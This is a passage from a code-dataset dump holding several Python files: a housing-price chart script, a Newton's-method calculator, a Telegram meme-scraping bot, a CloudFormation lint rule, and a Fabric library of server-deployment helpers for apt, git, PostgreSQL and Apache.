{0}\".format(len(df.index)))\n\n def format_price(price):\n formated_price = ''\n formated_price_number = -1\n for c in price:\n if c not in string.digits:\n break\n formated_price = formated_price + c\n if formated_price:\n formated_price_number = int(formated_price)\n return formated_price_number\n\n df.price = df.price.map(format_price)\n print(df.price)\n\n # 过滤房价为0的无效数据\n df = df[df.price > 0]\n # # 去除重复行\n # df = df.drop_duplicates()\n print(\"row number is {0}\".format(len(df.index)))\n\n ####################################################\n # 最贵的小区排名\n ####################################################\n df.sort_values(\"price\", ascending=False, inplace=True)\n city = df[\"area\"][0]\n xqs = df[\"name\"][min_num:max_num]\n prices = df[\"price\"][min_num:max_num]\n bar = Bar(\"{0}小区均价\".format(city))\n bar.add(\"小区均价前{},{}名\".format(min_num+1, max_num), xqs, prices, is_stack=True, is_label_show=True, xaxis_interval=0, xaxis_rotate=45)\n bar.render(path=\"xiaoqu.html\")\n\n ####################################################\n # 区县均价排名\n ####################################################\n district_df = df.groupby('district').mean()\n district_df = district_df.round(0)\n district_df.sort_values(\"price\", ascending=False, inplace=True)\n print(district_df)\n districts = district_df.index.tolist()\n prices = district_df[\"price\"]\n bar = Bar(\"{0}区县均价\".format(city))\n bar.add(\"区县均价排名\", districts, prices, is_stack=True, is_label_show=True, xaxis_interval=0, xaxis_rotate=45)\n bar.render(path=\"district.html\")\n\n if auto_browse:\n web.open(\"http://localhost:8080/xiaoqu.html\", new=0, autoraise=True)\n # web.open(\"http://localhost:8080/district.html\", new=0, autoraise=True)\n # 确保页面打开\n time.sleep(15)\n\n\n","sub_path":"xiaoqu_to_chart.py","file_name":"xiaoqu_to_chart.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"396724416","text":"from math import *\r\nfrom sympy import *\r\n\r\nwhile True:\r\n l = input(\"Your function (like x**2; 2**x; 1/x + 1; 
etc): \\n\")\r\n x = symbols(\"x\")\r\n funct = Lambda(x, l)\r\n deriv = Lambda(x, diff(l))\r\n\r\n n = float(input(\"Give us any arbitrary value (x0): \\n\"))\r\n\r\n for w in range(100):\r\n n = n - (funct(n)/deriv(n))\r\n\r\n print(n)","sub_path":"Newton Approximator.py","file_name":"Newton Approximator.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"618200986","text":"from telegram.ext import Updater, InlineQueryHandler, CommandHandler\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nfrom Newsfun import *\n\n\nimport logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nlogging.basicConfig( filename='telegram.log',\n filemode='a',\n datefmt='%H:%M:%S',\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ndef get_memes():\n session = requests.Session()\n response = session.get(\"https://memechat.app\")\n soup = BeautifulSoup(response.content, 'html.parser')\n content_class = soup.find_all(\"div\", {\"class\": \"article-content\"})\n images = []\n image_url = []\n i = 0\n for img in content_class:\n images.append( img.find_all('img'))\n image_url.append(images[i][0]['src'])\n i = i + 1\n return image_url\n\n\ndef memes(update , context):\n name = update.effective_user.first_name\n logger.info(\"User %s started the Memes Command.\", name)\n memes = get_memes()\n chat_id = update.effective_message.chat_id\n for img in memes:\n context.bot.send_photo(chat_id=chat_id, photo=img)\n","sub_path":"memesfuns.py","file_name":"memesfuns.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"602277699","text":"\"\"\"\n Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n\n Permission is hereby granted, free of charge, to any person obtaining a copy of this\n software and associated documentation files (the \"Software\"), to deal in the Software\n without restriction, including without limitation the rights to use, copy, modify,\n merge, publish, distribute, sublicense, and/or sell copies of the Software, and to\n permit persons to whom the Software is furnished to do so.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\n INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom collections import defaultdict\nimport six\nfrom cfnlint.rules import CloudFormationLintRule\nfrom cfnlint.rules import RuleMatch\nimport cfnlint.helpers\n\n\nclass RouteTableAssociation(CloudFormationLintRule):\n \"\"\"Check only one route table association defined per subnet\"\"\"\n id = 'E3022'\n shortdesc = 'Resource SubnetRouteTableAssociation Properties'\n description = 'Validate there is only one SubnetRouteTableAssociation per subnet'\n source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-ec2-subnet-route-table-assoc.html'\n tags = ['resources', 'subnet', 'route table']\n\n # Namespace for unique associated subnets in the form condition::value\n resource_values = {}\n associated_resources = defaultdict(list)\n\n def get_values(self, subnetid, resource_condition, property_condition):\n \"\"\"Get string literal(s) from value of SubnetId\"\"\"\n values = []\n if isinstance(subnetid, dict):\n if len(subnetid) == 1:\n for key, value in subnetid.items():\n if key in cfnlint.helpers.CONDITION_FUNCTIONS:\n if isinstance(value, list):\n if len(value) == 3:\n property_condition = value[0]\n values.extend(self.get_values(value[1], resource_condition, property_condition))\n values.extend(self.get_values(value[2], resource_condition, property_condition))\n if key == 'Ref':\n values.extend(self.get_values(value, resource_condition, property_condition))\n if key == 'Fn::GetAtt':\n if isinstance(value[1], (six.string_types)):\n sub_value = '.'.join(value)\n values.append((resource_condition, property_condition, sub_value))\n else:\n values.append((resource_condition, property_condition, subnetid))\n return values\n\n def check_values(self, subnetid, resource_condition, resource_name):\n \"\"\"Check subnet value is not associated with other route tables\"\"\"\n property_condition = None\n values = self.get_values(subnetid, resource_condition, property_condition)\n self.resource_values[resource_name] = values\n for value in values:\n self.associated_resources[value].append(resource_name)\n\n def match(self, cfn):\n \"\"\"Check SubnetRouteTableAssociation Resource Properties\"\"\"\n matches = []\n resources = cfn.get_resources(['AWS::EC2::SubnetRouteTableAssociation'])\n for resource_name, resource in resources.items():\n properties = resource.get('Properties')\n if properties:\n resource_condition = resource.get('Condition')\n subnetid = properties.get('SubnetId')\n self.check_values(subnetid, resource_condition, resource_name)\n for resource_name in self.resource_values:\n for value in self.resource_values[resource_name]:\n bare_value = (None, None, value[2])\n other_resources = []\n\n if len(self.associated_resources[value]) > 1:\n for resource in self.associated_resources[value]:\n if resource != resource_name:\n other_resources.append(resource)\n\n if value != bare_value and self.associated_resources[bare_value]:\n other_resources.extend(self.associated_resources[bare_value])\n\n if other_resources:\n path = ['Resources', resource_name, 'Properties', 'SubnetId']\n message = 'SubnetId in {0} is also associated with {1}'\n matches.append(\n RuleMatch(path, message.format(resource_name, ', '.join(other_resources))))\n\n return 
matches\n","sub_path":"src/cfnlint/rules/resources/ectwo/RouteTableAssociation.py","file_name":"RouteTableAssociation.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"282374366","text":"\"\"\"\nFabric helpers\n\"\"\"\n\nimport hashlib\nimport os\nimport posixpath\nimport subprocess\nimport string\nimport sys\nimport tempfile\nimport textwrap\nimport urlparse\nfrom StringIO import StringIO\nfrom contextlib import closing\nfrom pipes import quote # TBD: use shlex.quote on Python 3.2+\n\nfrom fabric.api import (\n run, sudo, quiet, settings, cd, env, abort, task, with_settings,\n)\nfrom fabric.contrib.files import exists, append\nfrom fabric.utils import apply_lcwd\nfrom fabric.sftp import SFTP\n\n\n#\n# Constants\n#\n\n# Produced by 'ssh-keyscan github.com'\nGITHUB_SSH_HOST_KEY = \"github.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==\"\n\n# Fingerprint from https://help.github.com/articles/what-are-github-s-ssh-key-fingerprints/\nGITHUB_SSH_HOST_KEY_FINGERPRINT = \"16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48\"\nGITHUB_SSH_HOST_KEY_FINGERPRINT_SHA256 = \"SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8\"\n\n# Known SSH host keys to be added to ~/.ssh/known_hosts if needed\nKNOWN_HOSTS = {\n \"github.com\": GITHUB_SSH_HOST_KEY,\n}\n\n\n#\n# Command-line parsing\n#\n\ndef asbool(v):\n \"\"\"Convert value to boolean.\"\"\"\n if isinstance(v, basestring):\n return v.lower() in ('yes', 'true', 'on', '1')\n else:\n return bool(v)\n\n\ndef aslist(v):\n \"\"\"Convert value to list.\"\"\"\n if isinstance(v, basestring):\n return v.split()\n else:\n return list(v)\n\n\n#\n# System management helpers\n#\n\ndef assert_shell_safe(*args, **kw):\n \"\"\"Check that each argument can be passed to shell safely.\n\n This is ultra-paranoid mode: only a small set of whitelisted characters are\n allowed. No spaces, no leading dashes, no glob wildcards, no quotes, no\n backticks, no dollar signs, no history expansion, no brace expansion.\n\n Tilde expansion is allowed.\n\n It might be too strict. Therefore you can supply a keyword-only argument\n ``extra_allow`` that lists additional characters to be allowed.\n \"\"\"\n extra_allow = kw.pop('extra_allow', '')\n if kw:\n raise TypeError('unexpected keyword arguments: {}'\n .format(', '.join(sorted(kw))))\n allowed_chars = set(string.letters + string.digits + '/-._~')\n allowed_chars.update(extra_allow)\n for arg in args:\n if not set(arg) <= allowed_chars or arg.startswith('-'):\n raise ValueError('{} is not safe for shell'.format(arg))\n\n\ndef ensure_apt_not_outdated():\n \"\"\"Make sure apt-get update was run within the last day.\"\"\"\n if not run(\"find /var/lib/apt/lists -maxdepth 0 -mtime -1\", quiet=True):\n sudo(\"apt-get update -qq\")\n\n\ndef package_available(package):\n \"\"\"See if a package is available for installation.\"\"\"\n assert_shell_safe(package)\n with quiet():\n output = run('apt-cache madison {}'.format(package))\n # The terrible: apt-cache always returns status code 0 and never prints\n # to stderr, no matter if the package is or isn't available. The error\n # message is translated. 
If the package is available, the output is\n # a multi-line list with |-separated columns that contain package\n # names, versions, and the repository info.\n return '|' in output\n\n\ndef package_installed(package):\n \"\"\"Check if the specified package is installed.\"\"\"\n assert_shell_safe(package)\n # XXX: doing this in a loop is slow :(\n with quiet():\n # XXX idea: return exists('/var/lib/dpkg/info/{}.list'.format(package))\n # caveats: libnss-myhostname:amd64.list :/\n status = run(\"dpkg-query -W --showformat='${Status}' %s\" % package)\n return status == \"install ok installed\"\n\n\ndef install_packages(*packages, **kw):\n \"\"\"Install system packages.\n\n You can use any of these styles::\n\n install_packages('foo bar')\n install_packages('foo', 'bar')\n install_packages(['foo', 'bar'])\n\n Keyword arguments:\n\n - ``missing_only`` (default: False) -- apt-get install only the missing\n packages. This can be slower than just letting apt figure it out.\n\n - ``interactive`` (default: False) -- allow interactive prompts during\n package installation.\n\n - ``changelog`` (default: False) -- record installed packages in\n /root/Changelog\n\n \"\"\"\n missing_only = kw.pop('missing_only', False)\n interactive = kw.pop('interactive', False)\n changelog = kw.pop('changelog', False)\n if kw:\n raise TypeError('unexpected keyword arguments: {}'\n .format(', '.join(sorted(kw))))\n if len(packages) == 1 and not isinstance(packages[0], str):\n # handle lists and tuples\n packages = packages[0]\n packages = \" \".join(packages).split()\n if missing_only:\n packages = [p for p in packages if not package_installed(p)]\n if not packages:\n return\n ensure_apt_not_outdated()\n for package in packages:\n assert_shell_safe(package)\n command = \"apt-get install -qq -y %s\" % \" \".join(packages)\n if not interactive:\n command = \"DEBIAN_FRONTEND=noninteractive \" + command\n if changelog:\n changelog_append(\"apt-get install %s\" % \" \".join(packages))\n sudo(command)\n\n\ndef install_missing_packages(*packages, **kw):\n \"\"\"Install missing system packages.\n\n Alias for install_packages(*packages, missing_only=True, **kw).\n \"\"\"\n kw.setdefault('missing_only', True)\n install_packages(*packages, **kw)\n\n\ndef ssh_key_fingerprint(host_key, force_md5=False):\n \"\"\"Compute the fingerprint of a public key.\n\n Can return a SHA256 or an MD5 fingerprint, depending on your OpenSSH\n version. 
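(Newer OpenSSH prints the SHA256:... base64 form by default; older versions print colon-separated MD5 hex, as in the two GITHUB_SSH_HOST_KEY_FINGERPRINT constants above.) 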
You can insist on MD5 if you want.\n \"\"\"\n if not host_key.startswith('ssh-'):\n host_key = host_key.split(None, 1)[1]\n with tempfile.NamedTemporaryFile(prefix='pov-fabric-') as f:\n f.write(host_key)\n f.flush()\n output = subprocess.check_output(['ssh-keygen', '-l', '-f', f.name])\n # Example output (old ssh):\n # \"2048 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48 /tmp/github_rsa.pub (RSA)\\n\"\n # Example output (new ssh):\n # \"2048 SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8 no comment (RSA)\\n\"\n # Example output (new ssh with -E md5):\n # \"2048 MD5:16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48 no comment (RSA)\\n\"\n fingerprint = output.split()[1]\n if fingerprint.startswith('SHA256') and force_md5:\n # we want MD5 still, for backwards-compat, but we should stop doing\n # that eventually\n output = subprocess.check_output(['ssh-keygen', '-l', '-f', f.name,\n '-E', 'md5'])\n fingerprint = output.split()[1].replace('MD5:', '')\n return fingerprint\n\n\ndef register_host_key(host_key, fingerprint=None, fingerprints=None, force_md5=False):\n \"\"\"Register a known host key.\n\n This will be used by git_clone() and such to add the host key automatically\n if you're cloning from the host.\n \"\"\"\n if fingerprint is not None:\n if fingerprints is not None:\n raise ValueError('Please provide either fingerprint or fingerprints, but not both')\n fingerprints = [fingerprint]\n force_md5 = True\n hostname = host_key.split()[0]\n if hostname in KNOWN_HOSTS and KNOWN_HOSTS[hostname] != host_key:\n abort(\"There's a different host key already registered for {}\".format(hostname))\n if fingerprints:\n if ssh_key_fingerprint(host_key, force_md5=force_md5) not in fingerprints:\n abort(\"SSH host key doesn't match fingerprint\")\n KNOWN_HOSTS[hostname] = host_key\n\n\ndef ensure_known_host(host_key, known_hosts='/root/.ssh/known_hosts'):\n \"\"\"Make sure a host key exists in the known_hosts file.\n\n This is idempotent: running it again won't add the same key again.\n \"\"\"\n assert_shell_safe(known_hosts)\n if not exists(known_hosts, use_sudo=True):\n ensure_directory(posixpath.dirname(known_hosts), mode=0o700)\n sudo('touch %s' % known_hosts)\n # Must use shell=True to work around Fabric bug, where it would fall\n # flat in contains() with an error (\"sudo: export: command not\n # found\") that is silently suppressed, resulting in always appending\n # the ssh key to /root/.ssh/known_hosts. 
Probably because I use\n # `with shell_env(LC_ALL='C.UTF-8'):`.\n append(known_hosts, host_key, use_sudo=True, shell=True)\n\n\ndef ensure_user(user, shell=None, home=None, changelog=False, create_home=True):\n \"\"\"Create a system user if it doesn't exist already.\n\n This is idempotent: running it again won't add the same user again.\n \"\"\"\n assert_shell_safe(user, shell or '', home or '')\n with quiet():\n if run(\"id {user}\".format(user=user)).succeeded:\n # XXX: check if shell matches what we asked, and run chsh if not?\n return\n doit = run_and_changelog if changelog else sudo\n with settings(sudo_user=\"root\"):\n command = ['adduser --quiet --system --group --disabled-password']\n if shell:\n command.append('--shell={}'.format(shell))\n if home:\n command.append('--home={}'.format(home))\n if not create_home:\n command.append('--no-create-home')\n command.append(user)\n doit(\" \".join(command))\n\n\ndef ensure_locales(*languages):\n \"\"\"Make sure locales are generated.\n\n Example::\n\n ensure_locales('en', 'lt')\n\n \"\"\"\n assert_shell_safe(*languages)\n supported_locales = run(\"locale -a\", quiet=True).splitlines()\n # as a shortcut we'll assume that if one xx_... locale is supported\n # then all of them are supported\n supported_languages = set(locale.partition('.')[0].partition('_')[0]\n for locale in supported_locales)\n for language in languages:\n if language not in supported_languages:\n sudo(\"locale-gen {language}\".format(language=language))\n\n\ndef ensure_directory(pathname, mode=None):\n \"\"\"Make sure directory exists.\n\n Returns True if it had to create the directory, False if the directory\n already existed.\n \"\"\"\n if isinstance(mode, int):\n mode = '{:o}'.format(mode)\n assert_shell_safe(pathname, mode or '')\n if not exists(pathname, use_sudo=True):\n command = ['install -d']\n if mode:\n command.append('-m{}'.format(mode))\n command.append(pathname)\n sudo(' '.join(command))\n return True\n else:\n return False\n\n\ndef upload_file(local_file, remote_path, mode=0o644, owner=\"root:root\",\n temp_dir=\"\", changelog=False):\n \"\"\"Upload a file to a remote host.\n\n ``local_file`` can be a filename or a seekable file-like object. Globbing\n is not supported.\n\n ``remote_file`` should be a full filename, not just the directory.\n\n ``mode`` can be an integer (e.g. 0o755).\n\n ``changelog``, if True, adds a changelog message of the form \"uploaded\n {filename}\".\n\n Bug: doesn't handle ``with cd(...):`` or ``with lcd(...):``. 
Probably.\n\n Bug: doesn't set mode/ownership if the file exists and has the same content\n but different mode/ownership.\n\n Warning: is not suitable for uploading secrets (changes the mode after\n uploading the file), unless you take care to specify ``temp_dir`` to point\n to a non-world-readable area.\n\n Undocumented features that are subject to change without notice:\n ``mode`` can be a string or None; ``owner`` can be None.\n \"\"\"\n if isinstance(mode, int):\n mode = '{:o}'.format(mode)\n assert_shell_safe(remote_path, mode or '', temp_dir)\n assert_shell_safe(owner or '', extra_allow=':')\n local_is_path = not callable(getattr(local_file, 'read', None))\n if isinstance(local_file, StringIO) and not getattr(local_file, 'name', None):\n local_file.name = os.path.basename(remote_path)\n with closing(SFTP(env.host_string)) as ftp:\n if env.get('cwd'):\n home = ftp.normalize('.')\n temp_dir = posixpath.join(home, temp_dir)\n tmp_path = posixpath.join(\n temp_dir, hashlib.sha1(env.host_string + remote_path).hexdigest())\n assert_shell_safe(tmp_path)\n ftp.put(local_file, tmp_path, use_sudo=False, mirror_local_mode=False,\n mode=None, local_is_path=local_is_path, temp_dir=\"\")\n with quiet():\n same = sudo(\"test -f {realfile} && cmp -s {tempfile} {realfile}\".format(\n tempfile=tmp_path, realfile=remote_path)).succeeded\n if same:\n sudo(\"rm {tempfile}\".format(tempfile=tmp_path))\n return False\n else:\n if mode is not None:\n sudo('chmod {mode} {tempfile}'.format(mode=mode, tempfile=tmp_path))\n if owner:\n sudo('chown {owner} {tempfile}'.format(owner=owner, tempfile=tmp_path))\n sudo(\"mv {tempfile} {realfile}\".format(tempfile=tmp_path,\n realfile=remote_path))\n if changelog:\n changelog_append(\"# updated {}\".format(remote_path))\n return True\n\n\ndef render_jinja2(template_filename, context, template_dir=None):\n \"\"\"Render a Jinja2 template.\n\n Based on fabric.contrib.files.upload_template.\n\n Differences: adds back the trailing newline that Jinja2 eats for some\n reason.\n \"\"\"\n from jinja2 import Environment, FileSystemLoader\n template_dir = template_dir or os.getcwd()\n template_dir = apply_lcwd(template_dir, env)\n jenv = Environment(loader=FileSystemLoader(template_dir))\n text = jenv.get_template(template_filename).render(**context or {})\n return text.encode('UTF-8') + '\\n'\n\n\ndef render_sinterp(filename, context=None, template_dir=None):\n \"\"\"Render a Python 2 string template.\n\n Based on fabric.contrib.files.upload_template.\n \"\"\"\n if template_dir:\n filename = os.path.join(template_dir, filename)\n filename = apply_lcwd(filename, env)\n with open(os.path.expanduser(filename)) as inputfile:\n text = inputfile.read()\n if context:\n text = text % context\n return text\n\n\ndef generate_file(template, filename, context=None, use_jinja=False,\n mode=0o644, owner=\"root:root\", changelog_append=True):\n \"\"\"Generate a file from a template\n\n Generates ``filename`` on the remote server using ``template`` as a source.\n The syntax depends on ``use_jinja``: either Jinja2 (if True) or Python's\n builtin string formatting (of the older, ``%(name)s`` variety).\n ``context`` should be a dict containing variables for interpolation.\n\n Changes the file ownership and mode.\n\n Creates the parent directory automatically if it doesn't exist (owned by\n root, mode 0755).\n\n If ``changelog_append`` is True, calls changelog_append() to note that\n ``filename`` was generated.\n\n Returns True if it had to replace the file, False if the file already\n existed 
with the right content.\n \"\"\"\n assert_shell_safe(filename)\n ensure_directory(posixpath.dirname(filename))\n if use_jinja:\n text = render_jinja2(template, context)\n else:\n text = render_sinterp(template, context)\n if upload_file(StringIO(text), filename, mode=mode, owner=owner):\n changelog('# generated {filename}'.format(filename=filename),\n append=changelog_append)\n return True\n else:\n return False\n\n\ndef download_file(filename, url):\n \"\"\"Download a file from a given URL.\"\"\"\n assert_shell_safe(filename)\n assert_shell_safe(url, extra_allow=':')\n run_and_changelog('wget {url} -O {filename}'.format(url=url, filename=filename))\n\n\n#\n# Git\n#\n\ndef parse_git_repo(git_repo):\n \"\"\"Parse a git repository URL.\n\n git-clone(1) lists these as examples of supported URLs:\n\n - ssh://[user@]host.xz[:port]/path/to/repo.git/\n - git://host.xz[:port]/path/to/repo.git/\n - http[s]://host.xz[:port]/path/to/repo.git/\n - ftp[s]://host.xz[:port]/path/to/repo.git/\n - rsync://host.xz/path/to/repo.git/\n - [user@]host.xz:path/to/repo.git/\n - ssh://[user@]host.xz[:port]/~[user]/path/to/repo.git/\n - git://host.xz[:port]/~[user]/path/to/repo.git/\n - [user@]host.xz:/~[user]/path/to/repo.git/\n - /path/to/repo.git/\n - file:///path/to/repo.git/\n\n This function doesn't support the <transport>::<address>
    syntax, and it\n doesn't understand insteadOf shortcuts from ~/.gitconfig.\n \"\"\"\n if '://' in git_repo:\n return urlparse.urlparse(git_repo)\n if ':' in git_repo:\n netloc, colon, path = git_repo.partition(':')\n return urlparse.ParseResult('ssh', netloc, path, '', '', '')\n else:\n return urlparse.ParseResult('file', '', git_repo, '', '', '')\n\n\n@with_settings(sudo_user='root')\ndef git_clone(git_repo, work_dir, branch='master', force=False,\n changelog=False):\n \"\"\"Clone a specified branch of the git repository into work_dir.\n\n If work_dir exists and force is False (default), aborts.\n\n If work_dir exists and force is True, performs a 'git fetch' followed by\n 'git reset --hard origin/{branch}'.\n\n Takes care to allow SSH agent forwarding to be used for authentication,\n if you use SSH.\n\n Takes care to add the SSH host key to /root/.ssh/known_hosts, if you're\n cloning from a host in KNOWN_HOSTS.\n\n Returns the commit hash of the version cloned.\n \"\"\"\n assert_shell_safe(git_repo, extra_allow='@:')\n assert_shell_safe(work_dir, branch)\n env = {}\n url = parse_git_repo(git_repo)\n if url.scheme == 'ssh':\n host_key = KNOWN_HOSTS.get(url.hostname)\n if host_key:\n ensure_known_host(host_key)\n # sudo removes SSH_AUTH_SOCK from the environment, so we can't make use\n # of the ssh agent forwarding unless we cunningly preserve the envvar\n # and sudo to root (because only root and the original user will be\n # able to access the socket)\n env['SSH_AUTH_SOCK'] = run(\"echo $SSH_AUTH_SOCK\", quiet=True)\n if exists(posixpath.join(work_dir, '.git')):\n return git_update(work_dir, branch=branch, force=force,\n changelog=changelog, verify_remote_url=git_repo)\n doit = run_and_changelog if changelog else sudo\n with settings(shell_env=env):\n doit(\"git clone -b {branch} {git_repo} {work_dir}\".format(\n branch=branch,\n git_repo=git_repo,\n work_dir=work_dir))\n with cd(work_dir):\n got_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if changelog:\n changelog_append('# got commit {sha}'.format(sha=got_commit))\n return got_commit\n\n\n@with_settings(sudo_user='root')\ndef git_update(work_dir, branch='master', force=False, changelog=False,\n verify_remote_url=None):\n \"\"\"Update a specified git checkout.\n\n Aborts if the checkout cannot be fast-forwarded to the specified branch,\n unless force is specified.\n\n Discards all local changes (committed or not) if force is True, so use with\n care!\n\n Returns the commit hash of the version fetched.\n \"\"\"\n assert_shell_safe(work_dir, branch)\n env = {}\n with cd(work_dir):\n with quiet():\n tracking_branch = run(\"git rev-parse --symbolic-full-name 'HEAD@{u}'\")\n if not tracking_branch.startswith(\"refs/remotes/origin/\"):\n abort(\"{} is not tracking a branch from remote 'origin'\".format(work_dir))\n tracking_branch = tracking_branch[len(\"refs/remotes/origin/\"):]\n if force and tracking_branch != branch:\n changelog_append('cd {work_dir} && git checkout {branch}'.format(\n work_dir=work_dir, branch=branch))\n sudo(\"git checkout {branch}\".format(branch=branch))\n with quiet():\n tracking_branch = run(\"git rev-parse --symbolic-full-name 'HEAD@{u}'\")\n if not tracking_branch.startswith(\"refs/remotes/origin/\"):\n abort(\"{} is not tracking a branch from remote 'origin'\".format(work_dir))\n tracking_branch = tracking_branch[len(\"refs/remotes/origin/\"):]\n if tracking_branch != branch:\n abort(\"{} is not tracking branch {} (it's tracking {})\".format(\n work_dir, branch, tracking_branch))\n 
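# (added note) at this point HEAD is guaranteed to track origin/{branch};\n # the remote URL is verified next and SSH agent forwarding is re-primed,\n # mirroring what git_clone() does before it fetches.\n 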
git_repo = run(\"git config --get remote.origin.url\", quiet=True)\n if verify_remote_url and git_repo != verify_remote_url:\n abort(\"{} is not tracking the right remote {} (it's tracking {})\".format(\n work_dir, verify_remote_url, git_repo))\n url = parse_git_repo(git_repo)\n if url.scheme == 'ssh':\n host_key = KNOWN_HOSTS.get(url.hostname)\n if host_key:\n ensure_known_host(host_key)\n # sudo removes SSH_AUTH_SOCK from the environment, so we can't make use\n # of the ssh agent forwarding unless we cunningly preserve the envvar\n # and sudo to root (because only root and the original user will be\n # able to access the socket)\n env['SSH_AUTH_SOCK'] = run(\"echo $SSH_AUTH_SOCK\", quiet=True)\n with cd(work_dir):\n with settings(shell_env=env):\n sudo(\"git fetch\")\n old_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if force:\n changelog_append('cd {work_dir}\\n git fetch && git reset --hard origin/{branch}'.format(\n work_dir=work_dir, branch=branch))\n sudo(\"git reset --hard origin/{branch}\".format(branch=branch))\n else:\n changelog_append('cd {work_dir}\\n git pull --ff-only'.format(work_dir=work_dir))\n sudo(\"git merge --ff-only origin/{branch}\".format(branch=branch))\n got_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if changelog:\n if old_commit == got_commit:\n changelog_append(' # no changes')\n else:\n changelog_append(' # update {oldsha}..{sha}'.format(oldsha=old_commit, sha=got_commit))\n return got_commit\n\n\n#\n# PostgreSQL helper\n#\n\ndef postgresql_user_exists(user):\n \"\"\"Check if a postgresql user already exists.\"\"\"\n assert_shell_safe(user)\n out = sudo(\"psql -tAc \\\"SELECT 1 FROM pg_roles WHERE rolname = '%s'\\\"\" % user,\n user='postgres', quiet=True)\n return bool(out)\n\n\ndef ensure_postgresql_user(user):\n \"\"\"Create a PostgreSQL user if it doesn't exist already.\n\n This is idempotent: running it again won't add the same user again.\n \"\"\"\n assert_shell_safe(user)\n if not postgresql_user_exists(user):\n sudo(\"LC_ALL=C.UTF-8 createuser -DRS %s\" % user, user='postgres')\n\n\ndef postgresql_db_exists(dbname):\n \"\"\"Check if a PostgreSQL database already exists.\"\"\"\n assert_shell_safe(dbname)\n out = sudo(\"psql -tAc \\\"SELECT 1 FROM pg_database WHERE datname = '%s'\\\"\" % dbname,\n user='postgres', quiet=True)\n return bool(out)\n\n\ndef ensure_postgresql_db(dbname, owner):\n \"\"\"Create a PostgreSQL database if it doesn't exist already.\n\n This is idempotent: running it again won't create the database again.\n \"\"\"\n assert_shell_safe(dbname)\n if not postgresql_db_exists(dbname):\n sudo(\"LC_ALL=C.UTF-8 createdb -E utf-8 -l en_US.UTF-8 -T template0 -O %s %s\" % (owner, dbname),\n user='postgres')\n\n\n#\n# Apache\n#\n\ndef install_apache_website(apache_conf_template, domain, context=None,\n use_jinja=False, modules=[], reload_apache=True):\n \"\"\"Upload Apache config for a website and enable it.\n\n Takes care of\n - generating an apache config file template from ``apache_conf_template``\n - uploading it to /etc/apache2/sites-available/{domain}.conf\n - file permissions and ownership (0644, root:root)\n - creating a directory for logs (/var/log/apache2/{domain})\n - enabling the website with a2ensite\n - reloading apache\n\n Caveats:\n - assumes the Apache template configures logs in /var/log/apache2/{domain}\n - assumes any other files (such as SSL certificates and keys) required for\n the Apache config to work are already uploaded\n \"\"\"\n modules = aslist(modules)\n 
changed = generate_file(apache_conf_template,\n '/etc/apache2/sites-available/{}.conf'.format(domain),\n context=context, use_jinja=use_jinja)\n ensure_directory('/var/log/apache2/{}'.format(domain))\n modules = [m for m in modules\n if not exists('/etc/apache2/mods-enabled/{}.load'.format(m))]\n if modules:\n run_and_changelog(\"a2enmod {}\".format(' '.join(modules)))\n changed = True\n if not exists('/etc/apache2/sites-enabled/{}.conf'.format(domain)):\n run_and_changelog(\"a2ensite {}.conf\".format(domain))\n changed = True\n if reload_apache and changed:\n run_and_changelog(\"service apache2 reload\")\n\n\n#\n# OpenSSL\n#\n\nSTARTSSL_INTERMEDIATE_URL = 'https://www.startssl.com/certs/sub.class1.server.ca.pem'\n\n# A test on 2015-04-29 shows that STARTSSL_INTERMEDIATE_URL gives you the same\n# certificate as STARTSSL_INTERMEDIATE_SHA2_URL.\nSTARTSSL_INTERMEDIATE_SHA1_URL = 'https://www.startssl.com/certs/class1/sha1/pem/sub.class1.server.sha1.ca.pem'\nSTARTSSL_INTERMEDIATE_SHA2_URL = 'https://www.startssl.com/certs/class1/sha2/pem/sub.class1.server.sha2.ca.pem'\n\n\ndef 